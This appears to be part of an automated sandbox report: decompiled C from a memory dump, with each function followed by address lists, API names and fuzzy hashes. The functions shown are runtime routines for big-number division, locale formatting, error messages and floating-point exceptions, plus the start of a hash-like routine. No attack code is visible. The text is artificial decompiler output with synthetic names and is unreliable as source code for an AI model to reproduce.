                                                                            																	__eflags = _t333 - 0xffffffff;
                                                                            																	if(_t333 <= 0xffffffff) {
                                                                            																		continue;
                                                                            																	} else {
                                                                            																	}
                                                                            																}
                                                                            															} else {
                                                                            																__eflags = _t228 - _v8;
                                                                            																if(_t228 <= _v8) {
                                                                            																	break;
                                                                            																} else {
                                                                            																	goto L47;
                                                                            																}
                                                                            															}
                                                                            															L51:
                                                                            															_v8 = _t263;
                                                                            															goto L52;
                                                                            														}
                                                                            														_t209 = _v28;
                                                                            														goto L51;
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            											L52:
                                                                            											__eflags = _t209;
                                                                            											if(_t209 != 0) {
                                                                            												L54:
                                                                            												_t280 = _v60;
                                                                            												_t334 = 0;
                                                                            												_t355 = 0;
                                                                            												__eflags = _t280;
                                                                            												if(_t280 != 0) {
                                                                            													_t266 = _v20;
                                                                            													_t219 =  &(_a8[1]);
                                                                            													__eflags = _t219;
                                                                            													_v24 = _t219;
                                                                            													_v16 = _t280;
                                                                            													do {
                                                                            														_v44 =  *_t219;
                                                                            														_t225 =  *_t266;
                                                                            														_t286 = _t334 + _v72 * _v44;
                                                                            														asm("adc esi, edx");
                                                                            														_t334 = _t355;
                                                                            														_t355 = 0;
                                                                            														__eflags = _t225 - _t286;
                                                                            														if(_t225 < _t286) {
                                                                            															_t334 = _t334 + 1;
                                                                            															asm("adc esi, esi");
                                                                            														}
                                                                            														 *_t266 = _t225 - _t286;
                                                                            														_t266 = _t266 + 4;
                                                                            														_t219 = _v24 + 4;
                                                                            														_t164 =  &_v16;
                                                                            														 *_t164 = _v16 - 1;
                                                                            														__eflags =  *_t164;
                                                                            														_v24 = _t219;
                                                                            													} while ( *_t164 != 0);
                                                                            													_t263 = _v8;
                                                                            													_t280 = _v60;
                                                                            												}
                                                                            												__eflags = 0 - _t355;
                                                                            												if(__eflags <= 0) {
                                                                            													if(__eflags < 0) {
                                                                            														L63:
                                                                            														__eflags = _t280;
                                                                            														if(_t280 != 0) {
                                                                            															_t338 = _t280;
                                                                            															_t314 = _v20;
                                                                            															_t362 =  &(_a8[1]);
                                                                            															__eflags = _t362;
                                                                            															_t265 = 0;
                                                                            															do {
                                                                            																_t282 =  *_t314;
                                                                            																_t172 = _t362 + 4; // 0xa6a5959
                                                                            																_t362 = _t172;
                                                                            																_t314 = _t314 + 4;
                                                                            																asm("adc eax, eax");
                                                                            																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                                                                            																asm("adc eax, 0x0");
                                                                            																_t265 = 0;
                                                                            																_t338 = _t338 - 1;
                                                                            																__eflags = _t338;
                                                                            															} while (_t338 != 0);
                                                                            															_t263 = _v8;
                                                                            														}
                                                                            														_t263 = _t263 + 0xffffffff;
                                                                            														asm("adc dword [ebp-0x18], 0xffffffff");
                                                                            													} else {
                                                                            														__eflags = _v52 - _t334;
                                                                            														if(_v52 < _t334) {
                                                                            															goto L63;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            												_t213 = _v12 - 1;
                                                                            												__eflags = _t213;
                                                                            												_v16 = _t213;
                                                                            											} else {
                                                                            												__eflags = _t263;
                                                                            												if(_t263 != 0) {
                                                                            													goto L54;
                                                                            												}
                                                                            											}
                                                                            											_t331 = 0 + _t263;
                                                                            											asm("adc esi, 0x0");
                                                                            											_v20 = _v20 - 4;
                                                                            											_t313 = _v32 - 1;
                                                                            											_t262 = _a4;
                                                                            											_t278 = _v80 - 4;
                                                                            											_t206 = _v12 - 1;
                                                                            											_v76 = _t331;
                                                                            											_v32 = _t313;
                                                                            											_v80 = _t278;
                                                                            											_v12 = _t206;
                                                                            											__eflags = _t313;
                                                                            										} while (_t313 >= 0);
                                                                            									}
                                                                            									_t309 = _v16 + 1;
                                                                            									_t204 = _t309;
                                                                            									__eflags = _t204 -  *_t262;
                                                                            									if(_t204 <  *_t262) {
                                                                            										_t191 = _t204 + 1; // 0x1bd6cd
                                                                            										_t274 =  &(_t262[_t191]);
                                                                            										do {
                                                                            											 *_t274 = 0;
                                                                            											_t194 =  &(_t274[1]); // 0x91850fc2
                                                                            											_t274 = _t194;
                                                                            											_t204 = _t204 + 1;
                                                                            											__eflags = _t204 -  *_t262;
                                                                            										} while (_t204 <  *_t262);
                                                                            									}
                                                                            									 *_t262 = _t309;
                                                                            									__eflags = _t309;
                                                                            									if(_t309 != 0) {
                                                                            										while(1) {
                                                                            											_t271 =  *_t262;
                                                                            											__eflags = _t262[_t271];
                                                                            											if(_t262[_t271] != 0) {
                                                                            												goto L78;
                                                                            											}
                                                                            											_t272 = _t271 + 0xffffffff;
                                                                            											__eflags = _t272;
                                                                            											 *_t262 = _t272;
                                                                            											if(_t272 != 0) {
                                                                            												continue;
                                                                            											}
                                                                            											goto L78;
                                                                            										}
                                                                            									}
                                                                            									L78:
                                                                            									return _t331;
                                                                            								} else {
                                                                            									goto L23;
                                                                            								}
                                                                            							}
                                                                            						} else {
                                                                            							_t6 =  &(_t328[1]); // 0xfc23b5a
                                                                            							_t295 =  *_t6;
                                                                            							_v44 = _t295;
                                                                            							__eflags = _t295 - 1;
                                                                            							if(_t295 != 1) {
                                                                            								__eflags = _t349;
                                                                            								if(_t349 != 0) {
                                                                            									_t342 = 0;
                                                                            									_v12 = 0;
                                                                            									_v8 = 0;
                                                                            									_v20 = 0;
                                                                            									__eflags = _t349 - 0xffffffff;
                                                                            									if(_t349 != 0xffffffff) {
                                                                            										_t250 = _v16 + 1;
                                                                            										__eflags = _t250;
                                                                            										_v32 = _t250;
                                                                            										_t373 =  &(_t262[_t349 + 1]);
                                                                            										do {
                                                                            											_t253 = E001C0DE0( *_t373, _t342, _t295, 0);
                                                                            											_v68 = _t303;
                                                                            											_t373 = _t373 - 4;
                                                                            											_v20 = _t262;
                                                                            											_t342 = _t295;
                                                                            											_t303 = 0 + _t253;
                                                                            											asm("adc ecx, 0x0");
                                                                            											_v12 = _t303;
                                                                            											_t34 =  &_v32;
                                                                            											 *_t34 = _v32 - 1;
                                                                            											__eflags =  *_t34;
                                                                            											_v8 = _v12;
                                                                            											_t295 = _v44;
                                                                            										} while ( *_t34 != 0);
                                                                            										_t262 = _a4;
                                                                            									}
                                                                            									_v544 = 0;
                                                                            									_t41 =  &(_t262[1]); // 0x4
                                                                            									_t370 = _t41;
                                                                            									 *_t262 = 0;
                                                                            									E001BAA64(_t370, 0x1cc,  &_v540, 0);
                                                                            									_t247 = _v20;
                                                                            									__eflags = 0 - _t247;
                                                                            									 *_t370 = _t342;
                                                                            									_t262[2] = _t247;
                                                                            									asm("sbb ecx, ecx");
                                                                            									__eflags =  ~0x00000000;
                                                                            									 *_t262 = 0xbadbae;
                                                                            									return _v12;
                                                                            								} else {
                                                                            									_t14 =  &(_t262[1]); // 0x4
                                                                            									_t344 = _t14;
                                                                            									_v544 = 0;
                                                                            									 *_t262 = 0;
                                                                            									E001BAA64(_t344, 0x1cc,  &_v540, 0);
                                                                            									_t256 = _t262[1];
                                                                            									_t322 = _t256 % _v44;
                                                                            									__eflags = 0 - _t322;
                                                                            									 *_t344 = _t322;
                                                                            									asm("sbb ecx, ecx");
                                                                            									__eflags = 0;
                                                                            									 *_t262 =  ~0x00000000;
                                                                            									return _t256 / _v44;
                                                                            								}
                                                                            							} else {
                                                                            								_t9 =  &(_t262[1]); // 0x4
                                                                            								_v544 = _t198;
                                                                            								 *_t262 = _t198;
                                                                            								E001BAA64(_t9, 0x1cc,  &_v540, _t198);
                                                                            								__eflags = 0;
                                                                            								return _t262[1];
                                                                            							}
                                                                            						}
                                                                            					} else {
                                                                            						__eflags = 0;
                                                                            						return 0;
                                                                            					}
                                                                            				} else {
                                                                            					return _t197;
                                                                            				}
                                                                            			}























































































                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bc496
                                                                            0x001bc491
                                                                            0x001bc4db
                                                                            0x001bc4db
                                                                            0x001bc4dc
                                                                            0x001bc423
                                                                            0x001bc423
                                                                            0x001bc425
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bc425
                                                                            0x001bc4ec
                                                                            0x001bc4f1
                                                                            0x001bc4f4
                                                                            0x001bc4f8
                                                                            0x001bc4f9
                                                                            0x001bc4fc
                                                                            0x001bc4ff
                                                                            0x001bc500
                                                                            0x001bc503
                                                                            0x001bc506
                                                                            0x001bc509
                                                                            0x001bc50c
                                                                            0x001bc50c
                                                                            0x001bc514
                                                                            0x001bc51b
                                                                            0x001bc51c
                                                                            0x001bc51e
                                                                            0x001bc520
                                                                            0x001bc522
                                                                            0x001bc525
                                                                            0x001bc530
                                                                            0x001bc530
                                                                            0x001bc536
                                                                            0x001bc536
                                                                            0x001bc539
                                                                            0x001bc53a
                                                                            0x001bc53a
                                                                            0x001bc530
                                                                            0x001bc53e
                                                                            0x001bc540
                                                                            0x001bc542
                                                                            0x001bc544
                                                                            0x001bc544
                                                                            0x001bc546
                                                                            0x001bc54a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bc54c
                                                                            0x001bc54c
                                                                            0x001bc54f
                                                                            0x001bc551
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bc551
                                                                            0x001bc544
                                                                            0x001bc553
                                                                            0x001bc55d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bc268
                                                                            0x001bc0f2
                                                                            0x001bc0f2
                                                                            0x001bc0f2
                                                                            0x001bc0f5
                                                                            0x001bc0f8
                                                                            0x001bc0fb
                                                                            0x001bc12c
                                                                            0x001bc12e
                                                                            0x001bc179
                                                                            0x001bc17b
                                                                            0x001bc182
                                                                            0x001bc189
                                                                            0x001bc18c
                                                                            0x001bc18f
                                                                            0x001bc195
                                                                            0x001bc195
                                                                            0x001bc196
                                                                            0x001bc199
                                                                            0x001bc1a0
                                                                            0x001bc1a9
                                                                            0x001bc1ae
                                                                            0x001bc1b1
                                                                            0x001bc1b6
                                                                            0x001bc1b9
                                                                            0x001bc1bb
                                                                            0x001bc1c0
                                                                            0x001bc1c3
                                                                            0x001bc1c6
                                                                            0x001bc1c6
                                                                            0x001bc1c6
                                                                            0x001bc1ca
                                                                            0x001bc1cd
                                                                            0x001bc1cd
                                                                            0x001bc1d2
                                                                            0x001bc1d2
                                                                            0x001bc1dd
                                                                            0x001bc1e8
                                                                            0x001bc1e8
                                                                            0x001bc1eb
                                                                            0x001bc1f7
                                                                            0x001bc1fc
                                                                            0x001bc207
                                                                            0x001bc209
                                                                            0x001bc20b
                                                                            0x001bc211
                                                                            0x001bc216
                                                                            0x001bc218
                                                                            0x001bc21e
                                                                            0x001bc130
                                                                            0x001bc13c
                                                                            0x001bc13c
                                                                            0x001bc13f
                                                                            0x001bc14f
                                                                            0x001bc155
                                                                            0x001bc15c
                                                                            0x001bc15e
                                                                            0x001bc166
                                                                            0x001bc168
                                                                            0x001bc16a
                                                                            0x001bc16f
                                                                            0x001bc172
                                                                            0x001bc178
                                                                            0x001bc178
                                                                            0x001bc0fd
                                                                            0x001bc100
                                                                            0x001bc104
                                                                            0x001bc10a
                                                                            0x001bc119
                                                                            0x001bc123
                                                                            0x001bc12b
                                                                            0x001bc12b
                                                                            0x001bc0fb
                                                                            0x001bc0d6
                                                                            0x001bc0d9
                                                                            0x001bc0df
                                                                            0x001bc0df
                                                                            0x001bc0c5
                                                                            0x001bc0cb
                                                                            0x001bc0cb

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
                                                                            • Instruction ID: 0ca81753e2267c084b8b8a811d36f40e2c75e4da2c1118875b3b17d8fdbf125a
                                                                            • Opcode Fuzzy Hash: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
                                                                            • Instruction Fuzzy Hash: CA021C71E002199BDF14CFA9C8906EDBBF1FF98314F25816AE919E7284D731AE41CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001A9D99(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
                                                                            				short _v104;
                                                                            				short _v304;
                                                                            				short* _t23;
                                                                            				int _t24;
                                                                            
                                                                            				if( *0x1cd610 == 0) {
                                                                            					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
                                                                            					 *0x1ede30 = _v304;
                                                                            					 *0x1ede32 = 0;
                                                                            					 *0x1cd610 = 0x1ede30;
                                                                            				}
                                                                            				E0019F980(_a4, _a8,  &_v104, 0x32);
                                                                            				_t23 = _a12;
                                                                            				_t24 = _a16;
                                                                            				 *_t23 = 0;
                                                                            				GetNumberFormatW(0x400, 0,  &_v104, 0x1cd600, _t23, _t24);
                                                                            				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
                                                                            				return 0;
                                                                            			}








                                                                            APIs
                                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001A9DBF
                                                                            • GetNumberFormatW.KERNEL32 ref: 001A9E0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FormatInfoLocaleNumber
                                                                            • String ID:
                                                                            • API String ID: 2169056816-0
                                                                            • Opcode ID: a381f5bba9d633912d433b7da56c4ad2ff0d36fd0cff5ed97468cf56571da5ef
                                                                            • Instruction ID: 86999a09ed64a004bb9a67484e9e44e947ec00248b45a597fe6736fd3a4073d7
                                                                            • Opcode Fuzzy Hash: a381f5bba9d633912d433b7da56c4ad2ff0d36fd0cff5ed97468cf56571da5ef
                                                                            • Instruction Fuzzy Hash: 38017175100358BBDB108FA4EC45FAB7BBCEF19710F004426FA08DB150D3709954C7A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                            			E00196D06(WCHAR* _a4, long _a8) {
                                                                            				long _t3;
                                                                            				signed int _t5;
                                                                            
                                                                            				_t3 = GetLastError();
                                                                            				if(_t3 == 0) {
                                                                            					return 0;
                                                                            				}
                                                                            				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
                                                                            				asm("sbb eax, eax");
                                                                            				return  ~( ~_t5);
                                                                            			}






                                                                            APIs
                                                                            • GetLastError.KERNEL32(001A0DE0,?,00000200), ref: 00196D06
                                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00196D27
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: fb8c05a445c63ecd8d3d004a8510c274a6552f8829571abc05cc33741b28e21d
                                                                            • Instruction ID: 2f97e66035840748bb056bac1915cc534e9ec0a64d5311343bb11249787b5056
                                                                            • Opcode Fuzzy Hash: fb8c05a445c63ecd8d3d004a8510c274a6552f8829571abc05cc33741b28e21d
                                                                            • Instruction Fuzzy Hash: D4D0C971388302BFFE110AB08C0AF2A7B95B755B86F208905B3A6E90E0DA70D064D629
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001C0654(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                                            				signed int _t172;
                                                                            				signed int _t175;
                                                                            				signed int _t178;
                                                                            				signed int* _t179;
                                                                            				signed int _t195;
                                                                            				signed int _t199;
                                                                            				signed int _t202;
                                                                            				void* _t203;
                                                                            				void* _t206;
                                                                            				signed int _t209;
                                                                            				void* _t210;
                                                                            				signed int _t225;
                                                                            				unsigned int* _t240;
                                                                            				signed char _t242;
                                                                            				signed int* _t250;
                                                                            				unsigned int* _t256;
                                                                            				signed int* _t257;
                                                                            				signed char _t259;
                                                                            				long _t262;
                                                                            				signed int* _t265;
                                                                            
                                                                            				 *(_a4 + 4) = 0;
                                                                            				_t262 = 0xc000000d;
                                                                            				 *(_a4 + 8) = 0;
                                                                            				 *(_a4 + 0xc) = 0;
                                                                            				_t242 = _a12;
                                                                            				if((_t242 & 0x00000010) != 0) {
                                                                            					_t262 = 0xc000008f;
                                                                            					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                                            				}
                                                                            				if((_t242 & 0x00000002) != 0) {
                                                                            					_t262 = 0xc0000093;
                                                                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                                            				}
                                                                            				if((_t242 & 0x00000001) != 0) {
                                                                            					_t262 = 0xc0000091;
                                                                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                                            				}
                                                                            				if((_t242 & 0x00000004) != 0) {
                                                                            					_t262 = 0xc000008e;
                                                                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                            				}
                                                                            				if((_t242 & 0x00000008) != 0) {
                                                                            					_t262 = 0xc0000090;
                                                                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                                            				}
                                                                            				_t265 = _a8;
                                                                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                                                                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                                                                            				_t259 = E001BDFB6(_a4);
                                                                            				if((_t259 & 0x00000001) != 0) {
                                                                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                                            				}
                                                                            				if((_t259 & 0x00000004) != 0) {
                                                                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                                            				}
                                                                            				if((_t259 & 0x00000008) != 0) {
                                                                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                                            				}
                                                                            				if((_t259 & 0x00000010) != 0) {
                                                                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                                            				}
                                                                            				if((_t259 & 0x00000020) != 0) {
                                                                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                                            				}
                                                                            				_t172 =  *_t265 & 0x00000c00;
                                                                            				if(_t172 == 0) {
                                                                            					 *_a4 =  *_a4 & 0xfffffffc;
                                                                            				} else {
                                                                            					if(_t172 == 0x400) {
                                                                            						_t257 = _a4;
                                                                            						_t225 =  *_t257 & 0xfffffffd | 1;
                                                                            						L26:
                                                                            						 *_t257 = _t225;
                                                                            						L29:
                                                                            						_t175 =  *_t265 & 0x00000300;
                                                                            						if(_t175 == 0) {
                                                                            							_t250 = _a4;
                                                                            							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                                                                            							L35:
                                                                            							 *_t250 = _t178;
                                                                            							L36:
                                                                            							_t179 = _a4;
                                                                            							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                            							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                            							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                                            							if(_a28 == 0) {
                                                                            								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                                            								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                            								_t254 = _a4;
                                                                            								_t240 = _a24;
                                                                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                                            								 *(_a4 + 0x50) =  *_t240;
                                                                            							} else {
                                                                            								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                                            								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                            								_t240 = _a24;
                                                                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                                            								 *(_a4 + 0x50) =  *_t240;
                                                                            							}
                                                                            							E001BDF1C(_t254);
                                                                            							RaiseException(_t262, 0, 1,  &_a4);
                                                                            							_t256 = _a4;
                                                                            							if((_t256[2] & 0x00000010) != 0) {
                                                                            								 *_t265 =  *_t265 & 0xfffffffe;
                                                                            							}
                                                                            							if((_t256[2] & 0x00000008) != 0) {
                                                                            								 *_t265 =  *_t265 & 0xfffffffb;
                                                                            							}
                                                                            							if((_t256[2] & 0x00000004) != 0) {
                                                                            								 *_t265 =  *_t265 & 0xfffffff7;
                                                                            							}
                                                                            							if((_t256[2] & 0x00000002) != 0) {
                                                                            								 *_t265 =  *_t265 & 0xffffffef;
                                                                            							}
                                                                            							if((_t256[2] & 0x00000001) != 0) {
                                                                            								 *_t265 =  *_t265 & 0xffffffdf;
                                                                            							}
                                                                            							_t195 =  *_t256 & 0x00000003;
                                                                            							if(_t195 == 0) {
                                                                            								 *_t265 =  *_t265 & 0xfffff3ff;
                                                                            							} else {
                                                                            								_t206 = _t195 - 1;
                                                                            								if(_t206 == 0) {
                                                                            									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                                                                            									L55:
                                                                            									 *_t265 = _t209;
                                                                            									L58:
                                                                            									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                                                                            									if(_t199 == 0) {
                                                                            										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                                                                            										L64:
                                                                            										 *_t265 = _t202;
                                                                            										L65:
                                                                            										if(_a28 == 0) {
                                                                            											 *_t240 = _t256[0x14];
                                                                            										} else {
                                                                            											 *_t240 = _t256[0x14];
                                                                            										}
                                                                            										return _t202;
                                                                            									}
                                                                            									_t203 = _t199 - 1;
                                                                            									if(_t203 == 0) {
                                                                            										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                                                                            										goto L64;
                                                                            									}
                                                                            									_t202 = _t203 - 1;
                                                                            									if(_t202 == 0) {
                                                                            										 *_t265 =  *_t265 & 0xfffff3ff;
                                                                            									}
                                                                            									goto L65;
                                                                            								}
                                                                            								_t210 = _t206 - 1;
                                                                            								if(_t210 == 0) {
                                                                            									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                                                                            									goto L55;
                                                                            								}
                                                                            								if(_t210 == 1) {
                                                                            									 *_t265 =  *_t265 | 0x00000c00;
                                                                            								}
                                                                            							}
                                                                            							goto L58;
                                                                            						}
                                                                            						if(_t175 == 0x200) {
                                                                            							_t250 = _a4;
                                                                            							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                                                                            							goto L35;
                                                                            						}
                                                                            						if(_t175 == 0x300) {
                                                                            							 *_a4 =  *_a4 & 0xffffffe3;
                                                                            						}
                                                                            						goto L36;
                                                                            					}
                                                                            					if(_t172 == 0x800) {
                                                                            						_t257 = _a4;
                                                                            						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                                                                            						goto L26;
                                                                            					}
                                                                            					if(_t172 == 0xc00) {
                                                                            						 *_a4 =  *_a4 | 0x00000003;
                                                                            					}
                                                                            				}
                                                                            			}
























                                                                            APIs
                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001C064F,?,?,00000008,?,?,001C02EF,00000000), ref: 001C0881
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3997070919-0
                                                                            • Opcode ID: 3532701fcd9098486519fcbb46d1549aef6b485814d7f4bcdf40dc4260ff315c
                                                                            • Instruction ID: e23c8fcc5a97d769298bd559d8880b0c8fad2de963f1d27b33aeb3fa36b0d84b
                                                                            • Opcode Fuzzy Hash: 3532701fcd9098486519fcbb46d1549aef6b485814d7f4bcdf40dc4260ff315c
                                                                            • Instruction Fuzzy Hash: CBB12935610608DFD71ACF28C48AB657BA0FF59364F29865CE9D9CF2A2C335E991CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 81%
                                                                            			E00193EAD() {
                                                                            				void* _t230;
                                                                            				signed int* _t231;
                                                                            				intOrPtr _t240;
                                                                            				signed int _t245;
                                                                            				intOrPtr _t246;
                                                                            				signed int _t257;
                                                                            				intOrPtr _t258;
                                                                            				signed int _t269;
                                                                            				intOrPtr _t270;
                                                                            				signed int _t275;
                                                                            				signed int _t280;
                                                                            				signed int _t285;
                                                                            				signed int _t290;
                                                                            				signed int _t295;
                                                                            				intOrPtr _t296;
                                                                            				signed int _t301;
                                                                            				intOrPtr _t302;
                                                                            				signed int _t307;
                                                                            				intOrPtr _t308;
                                                                            				signed int _t313;
                                                                            				intOrPtr _t314;
                                                                            				signed int _t319;
                                                                            				signed int _t324;
                                                                            				signed int _t329;
                                                                            				signed int _t333;
                                                                            				signed int _t334;
                                                                            				signed int _t336;
                                                                            				signed int _t337;
                                                                            				signed int _t338;
                                                                            				signed int _t340;
                                                                            				signed int _t341;
                                                                            				signed int _t342;
                                                                            				signed int _t348;
                                                                            				signed int _t350;
                                                                            				signed int _t351;
                                                                            				signed int _t353;
                                                                            				signed int _t355;
                                                                            				signed int _t356;
                                                                            				signed int _t358;
                                                                            				signed int _t360;
                                                                            				signed int _t362;
                                                                            				signed int _t363;
                                                                            				signed int _t365;
                                                                            				signed int _t366;
                                                                            				signed int _t368;
                                                                            				signed int _t369;
                                                                            				signed int _t371;
                                                                            				signed int _t372;
                                                                            				signed int _t374;
                                                                            				signed int _t375;
                                                                            				intOrPtr _t376;
                                                                            				intOrPtr _t377;
                                                                            				signed int _t379;
                                                                            				signed int _t381;
                                                                            				intOrPtr _t383;
                                                                            				signed int _t385;
                                                                            				signed int _t386;
                                                                            				signed int _t388;
                                                                            				signed int _t389;
                                                                            				signed int _t390;
                                                                            				signed int _t391;
                                                                            				signed int _t392;
                                                                            				signed int _t393;
                                                                            				signed int _t394;
                                                                            				signed int _t395;
                                                                            				intOrPtr _t396;
                                                                            				signed int _t398;
                                                                            				intOrPtr _t399;
                                                                            				signed int _t407;
                                                                            				signed int _t409;
                                                                            				signed int _t411;
                                                                            				signed int _t412;
                                                                            				signed int _t414;
                                                                            				signed int _t418;
                                                                            				signed int _t420;
                                                                            				signed int _t422;
                                                                            				signed int _t423;
                                                                            				signed int _t425;
                                                                            				signed int _t427;
                                                                            				signed int _t429;
                                                                            				intOrPtr _t431;
                                                                            				signed int _t433;
                                                                            				intOrPtr _t434;
                                                                            				void* _t435;
                                                                            				void* _t436;
                                                                            				void* _t437;
                                                                            
                                                                            				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
                                                                            				_t342 = 0x10;
                                                                            				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
                                                                            				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
                                                                            				_t436 = _t435 + 0xc;
